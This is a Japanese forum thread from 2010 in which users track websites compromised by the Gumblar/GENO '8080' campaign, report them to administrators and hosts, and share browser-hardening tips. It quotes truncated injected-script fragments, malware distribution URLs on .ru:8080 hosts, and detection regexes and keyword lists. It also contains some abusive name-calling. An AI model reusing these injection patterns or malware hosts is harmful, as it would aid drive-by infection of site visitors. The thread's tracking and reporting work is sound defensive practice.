【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】

www●belbird●com
www●my-standard●co●jp
wangnin●com
www●pasotasu●net←パソコントラブル解決？無理でしょ
www●mamapapa●net←pasotasuが作成しているサイト

例えば>>118
aguseでは、上から一つ目三つ目だけGumblarの疑いありの判断。
gredでは、すべてSAFEと判断。

こういったツールすらスルーするものをここで報告してる人はどうやって見つけてんの
感染してそうなサイトをしらみ潰しにソース見てるとか？

>>119
見つけてくるんじゃなくて、自分で仕込んで
ここで晒してるだけなんだよｗ

>>119
分からない人は知る必要がないよ
対策をちゃんとしてればいい

知る必要がないとか

>>99
鯖缶から該当サイトに伝達のお返事ありました。
401になってます。

>>118
一部の感染だけは認めるが後はでっち上げか

Avastあたりで診断しているなら誤診か

誤診あげ

図星か

>>124
全部見たわけじゃないけど
例えばpasotasuは明らかに今日修正してる
他のページは2009年のほぼ同時刻にまとめて更新されてるのに特定ページだけ今日更新
しかも発見が遅れたTOPじゃないページは4時間後に修正
原因わかってないだろうから再改ざんされる可能性が高い

top Tue, 25 May 2010 08:16:10 GMT
repair.html Tue, 25 May 2010 12:50:38 GMT
hoshu.html Wed, 29 Jul 2009 01:32:40 GMT
order.html Wed, 29 Jul 2009 01:32:47 GMT
price.html Wed, 29 Jul 2009 01:32:47 GMT
profile.html Wed, 29 Jul 2009 01:32:48 GMT

>>128
言い訳は見苦しいな

>>129
ぱそたすさん自演おつです＾＾＾＾
そんなことするより早くPCをなおしたほうがいいよ＾＾＾＾＾

よくクソミソな精度で感染報告できたもんだ

あること無いことをでっち上げて、三流週刊誌並みの意識だな

ID出ないの不便だな
>>128は自分だけど>>118は違う人
報告されてるのを確認しただけだから探し方は知らん

pasotasuも再改ざんされればわかるだろ
見苦しい抵抗でかわいそうになるな

嘘をつくならもっと上手い嘘にしろ

ローテクな検出機では、誤検出も止むを得ないか（笑）

>>128-129
感染ページを確認すたのでメルポするを。

>>136 ど〜ん
でじろにも報告すた。

勘違いの迷惑なメールほどうざいものはない
間違いを素直に認めればいいものを

緑になりますやうに。(-人-)
ttp://online.drweb.com/result?url=%68%74%74%70%3a%2f%2f%77%77%77%2e%70%61%73%6f%74%61%73%75%2e%6e%65%74%2f%6b%6f%75%7a%61%2f%69%6e%64%65%78%2e%68%74%6d%6c

age

セキュリティ板の勢いトップのスレはこんなものか（笑）
呆れたぜ（笑笑笑）

勢いに流されるなんて、お馬鹿ですね

新たな板に移るか（笑笑笑）

モレもつれてって〜(笑笑笑)

この寒々しいスレを少しでも活気付ける為にも笑々しいスレにしてみせます
というのが>>141のマニフェストということか

奥が深い

>>138
パソコン活用講座でウイルスに感染しようとは
ぱそたすさんはハイレベルおすなあ

サンスポネット大人向けがとってもmondaybubbleなことに…
とりあえずメル凸しといた

>>147
乙、鯖缶とサンスポとmsnにもフォームでつーほーすた。

www.pasotasu.netさん
mamapapaはGoogleのキャッシュに残ってますよ
http://megalodon.jp/2010-0526-0434-07/web-sniffer.net/?url=http://webcache.googleusercontent.com/search?q=cache:jBiCW_fYPi0J:www.mamapapa.net/korean/

ちゃんと改竄告知したほうがプロっぽいですよ

pasotasuも魚拓あるから
http://megalodon.jp/2010-0525-2213-39/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Epasotasu%2Enet%2Fkouza%2Findex%2Ehtml

というか、噛み付いてたのは隠蔽しようと目論んだ社員だろｗ

うわっ気色悪い書き込み；知的障害者？

pasotasu()笑

ふぁびょんなよ双方

ぱそたすわかりやすすぎてかわいそうになる

【陥落サイトのURL悪用厳禁】
www●biz-x●jp
www●wille2●com/
allety●net ←8080 ＋ str="<ijbwjuics src=" + unescape(
www●hawaiianwalker●com/

【本日の目玉商品（違）】
www●n2p●jp/
Web制作、Webデザイン、システム開発･･

dokuta●ehoh●net

> www●n2p●jp/
？？？

ちょっと追記
www●n2p●jp/には、最下部の8080と･･･
<body id="n2p.jp" class="topBody">
<script type='text/javascript'>str="<ijbwjuics src=" + unescape(･･･
2系統が装填されておりますｗ

更に･･･
webcache●googleusercontent●com/search?q=cache:UROQ0WRKXtQJ:www●n2p●jp/
ijbwjuics src= → ない
8080 → 装填済

aspstone-co●com/blog/

> 最下部の8080と
？？？

通販サイトが改ざんされて
それを放置したままというのがありえない

まさか管理者は改ざんされたことを知らずにサイトの更新だけしているのか？

>>161
ttp://jsunpack.jeek.org/dec/go?report=008baa3edce14258adb5e906fc5e9e8eb500897b

具体的にどこよ

>>147
サンスポ本体もまずい？

通常JavaScriptとかFlashは切ってるんだけど
Flashクッキーってみんなどうしてる？

一応、今は切ってるんだけど
必要な際いちいち入れるの面倒でちょっと迷ってたり……

Flashクッキーが悪用される例とかってどのくらいあるん？

アップーでとしてれば大丈夫だから
アホは考えるだけ無駄

クッキーが何かすら分かってないんだな

>>168
そりゃおめーだろ

AdobeReaderを使ってなくてJava Runtime Environmentを最新版に更新してれば
Web改竄ウイルスには感染しないの？

>>167
自分の脳みそもうｐだてしとけば？

ふぁびょったか

JREの残骸が消えてくれない

ふぁっびょーん

IDでねー板は駄目だなｗ
そもそもネタスレなのかも知れねーけどｗ

JREの残骸ってJavaRaで消えるのでは？

>>176
俺はアンインストールしてから
やったらきえた

>>166
CCクリーナーで簡単に管理できるよ
おれっちは全部拒否

>>178
オプション＞クッキーリストまでは辿りついたけど
操作（拒否？削除？）が分かんないっす・・・

みんなやっぱFlashクッキーも切ってるのか・・・？

んなわけねえだろアホらしい

クッキーってテキストだろ
Flashのは違うのか

HTTPリダイレクト全部弾いてるって奴もいたから何とも言えないな
人それぞれ

ここレベル高けぇんだか低いんだか全く分からん……

玉石混淆

>>3
以上のことはおまじないレベルだから好きにしろ

>>170
使ってないんじゃなくてアンインストールしないとだめ

>>179
保持したいクッキーのurlを右側の欄にドラッグ＆ドロップ
拒否したい場合はなにもしなくてもOK

つまりCCクリーナーインストールした時点でクッキーは全部はじかれる

ちなみにFlashクッキーはGumblarに関係ない

スレチだがflash cookieについて
http://www.itmedia.co.jp/news/articles/0908/13/news017.html

CCクリーナーではなくCｃleanerつまりCクリーナーである件について

>>190
ありがとう。こういうものの存在すら知らなかった…

>156　確かに目玉商品ｗ

>>189
あるよ。
以上。
はい次の方。

結局ただのクッキーじゃねえか
いばりやがって

>>118
再発？orあれからまだ気づいてない？
aguseで反応
wangnin●com/about/index●html

gredじゃ反応せず
このスレ見てると頼ってる人が多いみたいだけど、、、
gredは反応示すことがほとんどない
どっちが正しいのかは知らんけど

両方試して、片方だけでも疑いが出たら危険と思う
Danさんのでソース詳しく見てみればいいよ

>>196
tenthprofit■ru:8080/google.com/comdirect.de/macys.com.php
典型的な8080さんですね。ケツに謎のMD5ハッシュが付くのも特徴的。

ばらの花には棘がある
www●barakai●com

>>197
このスレ住人はソース直接見るからgredなんて頼ってないよ
お客さん向けに目安として示してるだけだよ

>>196
放置されてるだけだね
Last-Modified: Thu, 20 May 2010 02:53:32 GMT

>>201
PC初心者にはGENO系Gumbler系のスレが無いからねぇ
ここに縋るしかない

まぁだからってここに書いてあるURLじゃないから大丈夫とは絶対限らないんだけど
>>3>>4こなせば現状では万が一感染ページ踏んでも大丈夫だから怖がりすぎる必要は無い……筈

www●asu-job●com
pc-telcom●com
※population-japan●com関連

>>200
使えるねっとに問い合わせたら、こちらでは対処しかねるそうで

レンタルサーバーは安全、信頼の使えるねっとwwwww

thinkpadのIE8でネットを閲覧していたら
ウィルスバスター2010が反応してmal gumblarを
�@検出、駆除できず
�A隔離できずと表示されました

こんなこと初めてです。どうすればいいのでしょう？

URLは?
OSは
プラグインは?
ActiveXやJavaScript等の設定は?

>>198-202
なるほど
いろいろ事情がわかるコメでした

>>200
メル凸しときました

>>205
数日前にallety●netが陥落してたんで、つかえるネットにメル凸したら
「報告感謝、サービス停止したから確認して」って内容の返信がきたよ？

<script>var JFZSz = document;function kGccA(pFpvv){ var 〜
結果: 4/41 (9.76%)

width、height、length、style…樹を隠すには森の中ですか


>>200
>>205
「ご連絡いただきましたサイトにつきましては、弊社でも確認し
不正なスクリプトを確認させて頂きましたので、取り急ぎ
サービスの停止を行わせていただきました。」

との事

自分のWEBサイトへの攻撃ログ確認してたら
設置してないWordPressやらAWstatsを探そうとクロールしてるホストがあった
80番ポートが空いてたので、Dan's View Sourceで確認したら案の定「.ru:8080」があった
こういうのってボットネットワークのゾンビなのかねぇ？

>>210
サイトは停止してないし
Gumblar判定もまだでるけど？

>>212
何を止めたんだろうねｗｗｗサーバ止めないと駄目なのにねｗｗｗ

>>212
ふたりともリロード汁

制作会社のページに転送されるだろ？

>>2>>3の対策すれば大丈夫っていう人と
おまじない程度っていうひとがいるね
どっちがほんとなのかは謎といったところか

あ、aguseなら今ちょっと壊れてるぞ

aguse側のDNS更新されてなさそう

…とおもったら、wwwのサブドメインつけると止まってねえw

糞レスしてふたりともごめん

>３>４以上の
スクリプト全切とかをおまじない程度っていってんだよ

いや、やっぱりDNSの更新が行き渡ってないだけだ。

http://www●barakai●com/
http://barakai●com/
止まってる。

>>218
なるほど
わかりました

通用するのは今だけだと思うけどProxomitronで
scriptタグ後にハッシュ値がきたら警告するようにしてます

$NEST(<script,\1</script>)\s<!--[0-9a-f]+{32}--> にマッチで置換

ttp://www.tanteifile.com/newswatch/2010/05/27_01/image/03.jpg
ttp://www.tanteifile.com/newswatch/2010/05/27_01/image/04.jpg

このスレでときどき
忘れていた意外な情報を得る

取扱注意
www●adwalk●co●jp

そういえば、とある議員のホームページも改ざんされてたな

にゃ
http://www.hds-x●com/

http://www◎jyoho-review◎jp/item_list/
http://canyonhardware◎com/
http://otokudou◎h01◎jp/
http://www◎borneomarathon◎com/jpn/home◎html
http://www◎jyoho-review◎jp/item_list/
http://www◎spalodge◎co◎nz/
http://www◎ryu1◎co◎jp/
http://minatomo◎jp/
http://sartur◎com/
http://lavishad◎com/
http://hampson-scott◎com/
http://www◎ondeugendstel◎com/web/media2/index◎php?option=com_rss&feed=RSS2◎0&no_html=1

さて、エンジェルビーツ始まるまで寝るか…。重複チェックしてないお(｀・ω・´)

>>226
14時間も寝るのかよｗ

取扱注意
www●wood-sadoh●co●jp/classroom/index.html
TOPはまだ改ざんされてなかったけど、時間の問題だな

さてと、どんなサイトがGumblarに？
チェックしてゼロデイの傾向と対策を、、、
ってもう、まんべんなくだなｗ

>>228
管理者のセキュリティ意識が無いサイトがやられてるだけ
サイトの内容は無関係

【陥落サイトのURL悪用厳禁】
www●biz-x●jp
www●i-keiei●jp/
www●w-ouen●com/league/index●html ←早稲田大学応援部
cowgirl●jp/
↓
<script type='text/javascript'>str="<ijbwjuics src=･･･
<script>try {var Qv='QN'} catch(Qv){};var･･･

<!--改竄されたので絶賛放置中！-->
※アクセス注意！※
www●aquaview●jp
↓
www●aquaview●jp/m_shop/index●html
↓
webcache●googleusercontent●com/search?q=cache:9SfGiGAU864J:www●geocities●jp/kic_aquaview/order●html
※消滅してたので、キャッシュから･･

>>230
よいところにいらっしゃった

＞<script type='text/javascript'>str="<ijbwjuics src=･･･
これ、どうやって拾ったらいい？
色々試してるんだけどどうにもうまくいかない

取扱注意
www●garden-bank●com

www●i-keiei●jp
www●w-ouen●com/league
cowgirl●jp
www●garden-bank●com

メル凸済み、反応待ち

>>233
www●i-keiei●jp
なにもないが、メル凸済みだからか？

>>225のサイト、ブログ経由で凸した

>>231
"vxoq3" "xaoz3" ←センセイ向け
"ijbwjuics" "str.replace(" ←禿向け
現時点ではほとんど釣れないみたい･･･

8080系の陥落サイトに寄生してるから、ソースを見る時
<body>の後側も見ておくと良いかも

さすがに14時間も寝られなかった。

http://cocoro-dhp◎sakura◎ne◎jp/

>>234
センセイの記憶を覗いてみにゃ
webcache●googleusercontent●com/search?q=cache:RW9_Hzfo7hMJ:www●i-keiei●jp/

http://abs◎bij◎pl/
http://18tubeporn◎com/
http://extratube◎cn/
http://aimauto◎org/
http://laschuwi◎com/
http://kopolinos◎com/
http://mature-lessons-porn◎com/
http://ayume◎eu/
http://flowertask◎co◎jp/
http://wovens◎info/
http://mb3z◎jp/
http://lets-you◎jp/
http://hohoemi-link◎lovepop◎jp/

>>239
おまえは何をやってるんだ？

http://hyper◎heavy◎jp/
http://saicho◎co◎jp/
http://mag◎rdy◎jp/
http://jamur◎jp/
http://truth-co◎jp/
http://yamana◎sakura◎ne◎jp/
http://minatomo◎jp/
http://s1◎shard◎jp/syozyonudo/
http://makino-fudousan◎co◎jp/
http://kimihiro◎sakura◎ne◎jp/
http://situgyou◎bufsiz◎jp/
http://babylovers◎jp/

新しい方法試してみたけど、誤爆率高いorz
とりあえず.jpだけ。

>>240
クソコテ氏ねですね。

ごめんなさい。

テンプレ見てまともに出来ないなら余計なモン貼るなゴミがっつってんだよ

>>234
Gredで覗いてみて

>>235
乙です

>>236
ご教授感謝、無理を申しました
頑張ってみます

>>216>>219
そんなことあるんだ

>>198
少々亀レスですみませんが
たとえばどのようなコードや文字列に注意すればいいのでしょうか

まだaguseは元に戻ってない？

>>7を踏んでしまったのですが大丈夫でしょうか？

>>246
マルチはやめようね

>>7を踏んだのはつい先ほどなのですでに7のサイトは復旧されてるとは思うのですが

>>248,250
ここは鑑定スレじゃないから
↓こっちで聞け↓
勇気がなくて踏めないURL鑑定スレin初質 Part41
http://gimpo.2ch.net/test/read.cgi/qa/1274878983/

Ν即で>>226の一番下のやつ貼られてて会社のPCで踏んでしまったんですけどこれってやばいんでしょうか
>>3の設定に直してスキャンしてみましたけど何も出なかったです…

>>252
スペックかけよ

OS,ブラウザ,Adobe ReaderのVer,対策ソフト

>>252
踏んでから>>3の設定に直しても意味ないぞｗ
つか、アンチウイルスソフトは反応しなかったのか？
踏んだ時の症状を教えてくれ。

>>252
もしもそのPCで会社のサイト更新してるなら、そのうちお前さんの会社のサイトが
このスレに登場するww

ご愁傷さま

>>253,254
ありがとうございます

【OS】XP pro SP3
【ブラウザ】Internet Explorer 8(タブブラウザのDonut RAPTっての使ってます)
【Microsoft Updateの更新の状態】最新でした
【セキュリティソフトと年式】ノートンインターネットセキュリティ 2009
【回線の種類・ルータの有無】光回線でルータ使用中
【Adobe ReaderのVer】最新でした

Donut RAPT使ってる時はノートンの保護機能？は働かないみたいです

今は自宅のPCからでこれぐらいしか覚えてなくて申し訳ないです

>>248
大丈夫、数日前に対策されとる
>>99にも書かれとる
しかしテンプレに罠仕込むなんてこのスレどうしちまったんだ

>>255
いえ会社はサイト持ってないです
孫請けの零細ですので

最近のはVista・7のUAC・保護モードも素通りするのかね

>>256
>>【Adobe ReaderのVer】最新でした
これが本当なら大丈夫なはず。踏む前から最新だったんだよな？

>>256
AdobeReaderは最新じゃなくバージョンをきちんと確認しろ
JavaとFlashPlayerもね

>>260
はい、更新チェックで確認しました
そうですかとりあえず安心しました。ありがとうございます

>>261
連投すいません
>3の更新確認でそれら全て更新チェックして全て最初から最新だったと記憶してます。
後、図に乗った質問で申し訳ないんですけど、このウイルスはどういった悪さをするんでしょう？

>>262
ノートンなら以下のクラウド型と併用可だからしてみては？
【併用可】gred AntiVirusアクセラレータ part2
http://pc11.2ch.net/test/read.cgi/sec/1268032521/

>>257
ありがとうがざいます
一安心です

>>258
どっちみち感染したらFTP含めてWebサービスすべてのIDパスはとられる
自分だけでなくLAN内すべて

あとは偽セキュリティソフトのインストール、特定サイトへの攻撃、
BOT機能のインストールなどいろいろ

>>264
これは今後のセキュリティですね
ありがとうございます。あとで確認してみます

>>266
そうですか…
そうなってくると自分にはもうお手上げですねorz

>>267
そろそろスレチだが、
>>ノートンインターネットセキュリティ 2009
もしまだライセンス残ってるなら、2010にタダでバージョンうpできるからやっとけ。
http://updatecenter.norton.com/?NUCLANG=ja

>>257
荒らしの仕業だろ

>>257
>>16-19

>>268
了解です
みなさんありがとうございました

ttp://money●zarathustra-wins●net/2010/01/%E3%82%AC%E3%83%B3%E3%83%96%E3%83%A9%E3%83%BC%E5%AF%BE%E7%AD%96%E3%81%AE%E6%83%85%E5%A0%B1%E3%81%AE%E3%81%BE%E3%81%A8%E3%82%81/
鑑定スレに貼ってたな

日創研石川経営研究会
ウィルスに感染したのに告知無しで復旧
こういうところの会員も同じ穴の狢でモラルもないんだろうな。

>研究会
うさんくせー

専スレがあるじゃん

緑になりますやうに。(-人-)
http://online.us.drweb.com/result/?url=%68%74%74%70%3a%2f%2f%77%77%77%2e%69%2d%6b%65%69%65%69%2e%6a%70%2f%61%72%63%68%69%76%65%73%2f%63%61%74%31%2f%69%6e%64%65%78%2e%68%74%6d%6c

>>272
だが
ttp://www.zarathustra-wins.net/のサイトにある
ガンブラー対策のページだな
そこがやられたらしい
272のURLでググるとガンブラー質問系のサイトに結構貼られてるが罠か？

日創研石川経営研究会に電凸してみました
改竄の件は把握していない模様

ttp://www.aguse.jp/?m=w&url=www.i-keiei.jp&x=43&y=16
↑の076-234-5554あいびーらぼ？がHPを作っていると認めました

＞あいびーらぼ？さん
折り返しの電話ありませんねw
自分達のスキルに自信があるのでしょうね

このスレの情報以外の所も改竄されている様ですが、見つけられるかなw

www●j-sports●or●jp
www●itofound●or●jp
cgi●members●interq.or●jp/aquamarine/ruvi/

>>279
www●itofound●or●jp
ここはガンブラーによって改竄されていると話すと電話を切る
更に電話をすると無言攻撃をする非礼極まりない所
対応は停止する

＞www●j-sports●or●jp

CSJスポーツのサイト!?

管理人「gumbler？うっせぇバーカ」

あ

今日は所属してるボランティア団体が所有してるPC１０台に、>>4 を施した。
VistaのマシンなんだがSP2すら当たっていなかったので心配だった。
普段は車に積んで移動してるので、なかなかメンテナンスの機会がなくて
たまにＥモバなんかでネットに繋いだりするもんだからヒヤヒヤもので．．．

>>279
www●j-sports●or●jp
www●itofound●or●jp
cgi●members●interq.or●jp/aquamarine/ruvi/
メル凸済み、反応待ち

>>280
一応、so-netとJPCERT/CCにも通報してあります
コレでダメなら別の手を考えますよ…

>>281
ジェイスポーツは「www●jsports●co●jp」
感染してるのは「横浜市・川崎市サッカークラブ」です

告知もせず駆除するだけなんだなあ
個人ならまだわかる、でも法人が平然とやってのける
マジであきれる

【陥落サイトのURL悪用厳禁】
fps01●plala●or●jp/~zeiken/
www●marbell●jp/img2/photo/tenonaru/index●html
www●pflaster●co●jp/contact/

>>284
穴があるかもしれないPCには
Firefox＋NoScript＋AdblockPlus＋RequestPolicy
この組み合わせを推奨する。

NoScript→<IFRAME>禁止にチェックを入れる
AdblockPlus→|http://*:8080/* をブロック

>>288
レスありがとう
自宅のＰＣのデフォはFirefoxなんだが、車に積んでるのは
なにぶん初心者向け講習会用なので、困ったことにデフォは
ＩＥなんだなこれが。

Firefoxなどのブラウザは、MSEや無料版アンチウイルスの幾つかなどトラフィックスキャンをしないものとは組み合わせることは好ましくない
JavascriptはどうしてもONにすることがあると思う、その時にスキャンできず素通りしてしまってる

d-pic●net

Firefoxはむしろダメだろ

だなIEが一番

>>289
とりあえずIE8にしておけばいいとおもうよ
もしくはGoogleChrome
わりと初心者にもすんなり受け入れられる
初心者はそもそもIEでも慣れてるわけじゃないから実はなんでもいいのだ

>>287
メル凸済み、pflasterにはメール届かず、その他は反応待ち

>>291
メル凸済み、反応待ち

テンプラの対策してたらIE8でも保護モードで運用すれば
ゼロDay食わない限りそうそう怖いことなかろうて

>>273-276
15:50着、かすぺ対応とのこと、持ってる人は確認お願いぽ。
> Trojan-Downloader.JS.Pegel.av
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

>>278
乙乙。
鯖缶につーほーしておいてた返事、担当に伝えるとのこと。

てか>>276はまだ赤かったので>>297カキコしたんだが……

やっぱ未修正があるー。。。

>>279
おいおいそれってスカパーとかCATVのスポーツかよ？

>>286
駆除すらされずメル凸するまで放置ということもあるけど
まさか毎日ページを見ている管理人が改竄に気づいてないというパターンなのかな？

>>300
CSのJスポーツはwww●jsports●co●jp

ボランティア団体の方針で、ブラウザはＩＥ７ということになってて．．．
つまりその、テキストと画面のデザインがほんのちょっとでも異なると
講習生がとまどうからという理由で。

>>303
とまどうのは（柔軟性の無い）おしえているほうだにゃ。
互換性表示ってのあるのに…

あー、テキストって教習本のことか。
買い換えろ！
つか実施で説明できない人が教えてんのか。

馬鹿のくせに偉そうに指示するな

>>303
今後のことを考えても全く一緒なことはありえないから
画面は多少変わることもあることを口頭で良いから教えるべきだとは思う
家にあるPCがテキストと違うと使えないってことになるだろ
まあ車と違ってコロコロUI変えちゃってる方にも問題はあるんだけども

うん、言い過ぎたかも。

>>306
ノ

このスレにFirefoxのアンチがいる

お前や

逆で無知なくせに無闇に薦めるやつがいるだけ

みなさんご心配いただいてありがとう

なにぶん、講習生はお年寄りが対象なので、幹部連中は...

「セキュリティに関してはあまり教え過ぎるとせっかくのやる気をそぐし、
してはいけないことだらけでつまらなくて結局身に付かない」

...ということで、WindowsUpdateを教えることさえあまり乗り気ではないのですよ。

それに、件のパソコンは、長い時にはひと月に一日使うか使わないかっ
ていう利用頻度なもので、ネットにもあまり繋がないのでセキュリティ
アップデートかけるチャンスもなかなかないんです。

それでいていざ講習会が始まると、週一でネットには繋ぐけど
講習の準備と撤収作業が忙しくてアップデートどころじゃなくなっちゃうんで
かえって危ないです。

ＴＴＰ://www●aoisys●com/nonstyle/

帰省ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!

www●cheesecake●co.jp/cp/2010present05/

ヤフー懸賞経由で応募しようとリンク踏んだらノートン先生の警告でた。
さらに、aguseで、「Gumblarの可能性あり」と出てたから、ヤフーと懸賞主催者に伝えたけど、両者から感染してないわボケと言われたけど、感染してるよね？

>>315
site.jsとかやられてるっち。

ちょｗｗｗヤフーまでそんなこと言ってんの？
もしかしてHTMLしかみてないの？

なかなかやるものだなaguse

>>315
これどこにあるの？

>>319
>>316に書かれてるファイルを探せ。
んで、そのファイルの一番後ろ見ろ。

>>315
ボケまで言わないだろw
また電話して録音してみれば？
http://jsunpack.jeek.org/dec/go?report=7130e159282202ef242480c9a65e9a67430adf2f

該当サイトにフォームから戸津
鯖缶にもフォームから戸津
やほにもフォームから戸津
ついでにめるぽ

>>315が事実なら由々しき事態。
っと言いたいけど、jsファイルのみの感染の場合（ほかにもあるかもしんないけどー）
結構見逃されがちでこちらから指摘しないと対応されないぽ。。。

んでついでにVT通して送った検体だけど
かすぺは既に対応済みのこと。

> - HEUR:Trojan-Downloader.Script.Generic
> This files are already detected. Please update your bases.

VTのタイムラグか。。。orz......
ごめんよ、ひげおぢさん。

315
ごめん。ボケとまでは言われてないです。
ヤフーは、担当者に報告し検証した後、対処すると言われて2週間過ぎましたが、未だに応募可能たし、ウイルス感染無しと判断したんだなと。
懸賞主催者は、調べましたが、ウイルスに感染してません。ウイルスが蔓延してますので、チェックを2重にして気をつけると言われました。
なので、もう、シラネと思ってましたが、このスレ見て一応、このスレを読んでる人だけには報告しておこうと書き込みました。

このサイトのホスティングの「TSUKAERUNET」に通報すればよかったのに。
対応はいいホスティング会社なので、それらばもう止まってたかも

↓直接このURL送っておけば対応はやかったかもな。
ttp://www●cheesecake●co●jp/user_data/packages/org/js/site●js

>>315-316
これ、感染が結構古くない？　Wepawetに投げてみたけど、こういう結果だった。
　http://wepawet.iseclab.org/view.php?hash=d048d4b80057b854928823d9ef22c31f&t=1275179400&type=js

確かに感染しているんだけど、既に8080のマルウェア配布先が死んでる。（※）
なんで、悪意のある、感染させる方としてはとっくにyahooは用済み状態。

これ、yahooの感染〜マルウェア配布鯖停止まで気がつかれなかったとしたら、かなりヤバイ。

（※） Wepawerの解析結果で、Requestsの所の、http://gothguilt●ru:8080/google●com/espn●go●com/qip●ru●php
がマルウェアの配布元。　ここにアクセスに行くんだけど、既にStatus = Errorの通り、何も起きない。

私の方もVirtualPC使って無防備で踏んでみたけど、“今は” やっぱり何も落ちてこなかった。　現状無害だけど、どれだけ被害出たんだろう．．．orz

>>327
ちなみに、site.jsのVT結果。誰かが最近投げたばかりなので、そのまま引用。
　http://www.virustotal.com/jp/analisis/d3698d3fca4c319a19346e9451a437b99a4354533d8020dc559c28e686a2717b-1275156778

現時点でも検出 5/41とか．．．終わったねぇ。orz　NortonとKasperskyはヒューリスティックで検出するみたいだけど、その他はどうなっている事やら。

>>315,327
あ、スマン。Yahooが感染していたんじゃなくて、Yahooの懸賞の所に、感染したサイトがリンクされてたのか。

感染していたのは　cheesecake●co●jp　の方ですね。スミマセン

>>327
[Trend Micro Security Blog]から引用
http://blog.trendmicro.co.jp/archives/3340
>3 不正スクリプトによる不正サイトへの接続は、同じIPアドレスからは初回接続時（または初回接続後のわずかな時間）しか本来の（不正な）応答がされない。
　＝＞マルウェアサンプルの入手が困難になる。

IPアドレス以外に時間などで制御する可能性もありますし、まだ有害かもしれません

cheesecake●co●jpのサイト運営は、実質ここみたい

有限会社みのりや
www●minoriya●co●jp/result/

ここが大丈夫ですって言っているのでしょうね

>>315
user_data/packages/org/js/css.js infected with JS.Redirector.based.3
user_data/packages/org/js/navi.js infected with JS.Redirector.based.3
user_data/packages/org/js/win_op.js infected with JS.Redirector.based.3
user_data/packages/org/js/itembox.js infected with JS.Redirector.based.3
user_data/packages/org/js/site.js infected with JS.Redirector.based.3

メル凸済み、反応待ち

>>330
ん〜、確かに私がアクセス制御に引っかかった可能性はあるね。

とりあえず、流れをみるとサイト管理者の対応が糞らしいので、IE8のSmartScreenと、Firefox経由でGoogleSafeBlowsingに通報しておいた。
このまま放置されていれば、多分、数日中には赤くなるはず。　管理者は逆に青くなると思うが。（苦笑

>>332は
Last-Modified: Thu, 13 May 2010 11:14:38 GMT
Last-Modified: Thu, 13 May 2010 11:17:39 GMT
Last-Modified: Thu, 13 May 2010 11:18:05 GMT
Last-Modified: Thu, 13 May 2010 11:16:35 GMT
Last-Modified: Thu, 13 May 2010 11:17:49 GMT

>>324
> 2週間過ぎました
やほーは音沙汰無しでぷか。。。

直通なんてやめて
K察庁経由で伝えてもらえ

一件だけ投下しとくにゃ
【陥落サイトのURL悪用厳禁】
adajo●namidaame●com

凸してくれてる人＞乙です orz

>>280
ここって宗教団体のようですね

ttp://www●itofound●or●jp/contents/aisatsu●html
当財団は、宗教法人真如苑開祖、故伊藤真乗大僧正の遺志を受け継ぎ…

真如苑　vol.75
http://gimpo.2ch.net/test/read.cgi/psy/1269487603/

そういやyahooの占いのページが以前やられていたな
今回はyahooのトップページを開く分には大丈夫なんだろ？

>>337
googleは既に赤くなってる。
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=http://www.itofound.or.jp/

早く対応しないから...w

>>338
問題ない。懸賞のページから、>315のリンク先に飛ぶとアウトだったらしい。

【陥落サイトのURL悪用厳禁】
www●ooraka●com/
<TITLE>パソコン在宅ワーク・常識を超えたパソコン在宅ワーク！</TITLE>
マルウェアが勝手に仕事をしてくれるのが「常識を超えた」ということでしょうかネ？

以下、どーでも良いようなカスサイト
canyonhardware●com/
maillady●hirotu●net/
www●kireibast●sakura●ne●jp/exlwckaj

>>340
www●ooraka●com/
メル凸済み、反応待ち

カスサイトやらは後でまとめてJPCERT/CCに通報しときます
ちょっと仕事が立て込んでるので

>>326
その書き込みの時点で既に実行済み

www●pflaster●co●jp　　：Forbidden
d-pic●net　　：Forbidden
cgi●members●interq●or●jp/aquamarine/ruvi/　　：Forbidden
www●garden-bank●com　　：aguse、Gred、Dr.Webともに反応せず
cowgirl●jp　　：閉鎖？
www●barakai●com　　：aguse、Gred、Dr.Webともに反応せず
www●allety●net　　：閉鎖？

ソース確認してません、暇してるよって方は精査して頂けると助かります
他はまだ駄目みたいなので明日にでも再凸…

>>340
カスサイトとやらをまとめてJPCERT/CCに報告しておきました
ていうかこれ、いつ終息するんでしょorz

>>343追記
「Forbidden」はaguseGWで確認してます

>>341,343 乙です〜

【陥落サイトのURL悪用厳禁】
www●jc-consulting●jp/houkoku_m/index3●html ←絶賛放置中(再再再再･･･晒し)
www●hdta●jp ←絶賛放置中
ayako●h00●jp ←うんこ対応中 ※<!--<script>-->
www●jyoho-review●jp/link/ ←絶賛放置中
www●jyoho-review●jp/item_list/ ←(ﾟдﾟ;)

d-pic●net/ ←トップページのみ閉鎖
d-pic●net/以下の階層は絶賛公開中
↓
www●google●co●jp/search?hl=ja&source=hp&q=site%3Ad-pic●net%2F

fps01●plala●or●jp/~zeiken/ ←絶賛放置中
neta-script●lionking●jp/2007/08/ ←絶賛放置中

【陥落サイトのURL悪用厳禁】
www●spiceheads.com/index●html
↓
最下部の8080以外に
<body link="#DB0000"〜中略〜<script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70･･･
↓
79●135●152●181/stats/go●php?sid=1
※直接踏んだらGoogleに飛ばされて終了orz

この前の<ijbwjuics src=←の後継かな？

・レジナからwww●j-sports●or●jpへウイルスを駆除する様に伝えたとの連絡あり（まだ感染中…）
・つかえるネットからwww●cheesecake●co●jpのサービスを停止しましたとの連絡あり

www●i-keiei●jp　　：Forbidden
fps01●plala●or●jp/~zeiken　：Forbidden

残りはもうしばらく静観
カスサイト、駄目くさいですがどうしたもんでしょう…

>>346
いつもお世話さん
…なんだが、【陥落サイトのURL悪用厳禁】 って書くから悪用するヤツが増えるんじゃないか？
どうせ悪意のあるヤツは書いてもやるだろうし

それに「危険」って書いてあるボタンを押したくなるの法則

> IPAセキュリティセンターです。
> ご連絡、ありがとうございます。
> 当機構でも当該サイトの改ざんを確認しました。
> 改ざんが確認できたサイトの管理者宛てに、サイトが改ざんされている
> 旨の通告をしておきます。
2時間で返事が来たよ…仕事早いな

>>345
お疲れ様です
カスペルスキーがIflamerで検出、ついでにAviraに検体提出

>>346
さくらに通報しようと思ったらメルフォで蹴られた…何故に
他のは後でまとめて見ておきます

>>348
はずせないんじゃない？
過去にいちゃもんつけられてるし

取扱注意
www●rokudai-ouen●com

>>350
